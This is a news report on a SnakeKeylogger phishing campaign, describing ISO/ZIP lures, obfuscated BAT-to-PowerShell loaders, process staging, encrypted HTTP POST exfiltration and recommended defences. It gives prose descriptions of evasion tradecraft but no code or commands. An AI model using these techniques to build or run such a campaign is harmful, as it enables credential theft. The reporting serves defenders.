A fresh campaign deploying SnakeKeylogger is targeting users with weaponized emails that lead to the execution of PowerShell scripts and ultimately exfiltrate sensitive data. Security analysts warn that the threat now blends social engineering with native Windows scripting to evade detection.

Emails purporting to be from“CPA-Payment Files” or similar remittance services carry attachments-most often ISO or ZIP files. Once opened, these contain a malicious BAT file that launches PowerShell commands to fetch a secondary payload. That payload is the SnakeKeylogger executable, which then installs itself, harvests data and communicates with its command and control servers. The malware captures keystrokes, browser credentials, system metadata, and cookies before transmitting encrypted logs.
This attack chain was first observed on 7 October 2025, when several recipients reported emails titled“remittance advice for the payment dated 07-Oct-2025”. The attackers rely on both obfuscation and native scripting to stay under the radar.

Earlier iterations of SnakeKeylogger have used phishing campaigns that deliver the malware via Excel or HTA files. In one such campaign, Fortinet researchers documented how an Excel attachment exploited the CVE-2017-0199 vulnerability to drop a PowerShell loader, which in turn deployed the keylogger. That version already sought to steal browser-saved credentials, clipboard contents, and keystroke data.
Over time, the malware evolved: later variants introduced persistence via scheduled tasks, registry run keys, or blending with system processes to mask their presence. In some campaigns, attackers impersonated defence contractors to lend legitimacy to their email lures.

The current campaign adds two noteworthy refinements: first, the use of ISO and ZIP containers to bypass email filters that block Office documents; second, the invocation of PowerShell via obfuscated BAT scripts to reduce forensic footprints. Analysts trace much of the attack logic to embedded Base64 strings decoded at runtime to build download URLs and commands. Once the loader is in place, it stages SnakeKeylogger inside trusted processes to avoid triggering heuristics tied to newly spawned binaries.

Exfiltration occurs through HTTP POST requests disguised as legitimate telemetry to PHP endpoints on attacker-controlled domains. To evade network defenders, exfiltration intervals are randomized and local queuing is used if the C2 endpoint is unavailable. The collected data is encrypted using AES-256 GCM, with the encryption key derived from the machine's GUID and a salt. If detection occurs, the campaign may fall back to queuing for later retry.

Defence recommendations from cybersecurity firms include enforcing stringent email content filters, enabling PowerShell execution policies, and activating script block logging. Endpoint protection tools should monitor registry changes, command-line invocations, and anomalous network traffic, particularly POST requests to domains not tied to legitimate corporate services.

Notice an issue? Arabian Post strives to deliver the most accurate and reliable information to its readers. If you believe you have identified an error or inconsistency in this article, please don't hesitate to contact our editorial team at editor[at]thearabianpost[dot]com . We are committed to promptly addressing any concerns and ensuring the highest level of journalistic integrity.

MENAFN12102025000152002308ID1110183503